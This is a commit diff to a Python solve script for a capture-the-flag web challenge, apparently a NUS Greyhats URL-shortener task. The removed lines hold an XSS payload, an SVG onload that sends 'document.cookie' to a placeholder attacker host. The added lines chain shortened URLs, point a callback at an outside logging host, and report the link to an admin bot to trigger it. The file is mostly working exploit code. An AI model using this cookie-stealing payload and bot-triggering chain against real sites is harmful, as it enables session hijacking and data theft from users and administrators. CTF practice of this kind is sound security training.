This commit is contained in:
2025-06-01 01:29:56 +02:00
parent 5cc21125e5
commit d800de05fb
5 changed files with 123 additions and 14 deletions

View File

@@ -1,25 +1,41 @@
import requests
from bs4 import BeautifulSoup
ATTACKER_HOST = "http://your.attacker.com/log"
TARGET = "http://target-ctf.com"
LOCAL = True
# Step 1: Create a shortened URL with a malicious payload
payload_url = f"data:text/html,<svg onload=fetch('{ATTACKER_HOST}?c='+document.cookie)>"
if LOCAL:
TARGET = "http://localhost:33001/"
else:
TARGET = "http://challs2.nusgreyhats.org:33001/" # Change this to actual challenge
CALLBACK = "http://oops.cato447.de/log"
payload_url = f"{CALLBACK}/payload"
print("[*] Submitting payload...")
res = requests.post(f"{TARGET}/", data={"original_url": payload_url})
assert res.ok
print("[+] Shortened URL submitted")
# Step 2: Extract short code from the response
from bs4 import BeautifulSoup
soup = BeautifulSoup(res.text, "html.parser")
short_link = soup.find("input", {"id": "shortened"})["value"]
short_code = short_link.split("/")[-1]
short_input = soup.find("input", {"id": "shortenedUrl"})
assert short_input, "Shortened URL input not found"
short_url = short_input["value"]
print(f"[+] Short URL: {short_url}")
# Step 3: Submit to /report endpoint
report_res = requests.post(f"{TARGET}/report", data={"submit_id": short_link})
if report_res.ok:
print(f"[+] Reported to bot: {short_link}")
print("[*] Submitting short url...")
res = requests.post(f"{TARGET}/", data={"original_url": short_url})
assert res.ok
soup = BeautifulSoup(res.text, "html.parser")
short_pointer_input = soup.find("input", {"id": "shortenedUrl"})
assert short_pointer_input, "Shortened pointer URL input not found"
short_pointer_url = short_pointer_input["value"]
print(f"[+] Short pointer URL: {short_pointer_url}")
print("[*] Reporting...")
report = requests.post(f"{TARGET}/report", data={"submit_id": short_pointer_url})
if report.ok:
print("[+] Reported to admin — wait for callback!")
else:
print("[-] Report failed")
print("[-] Reporting failed.")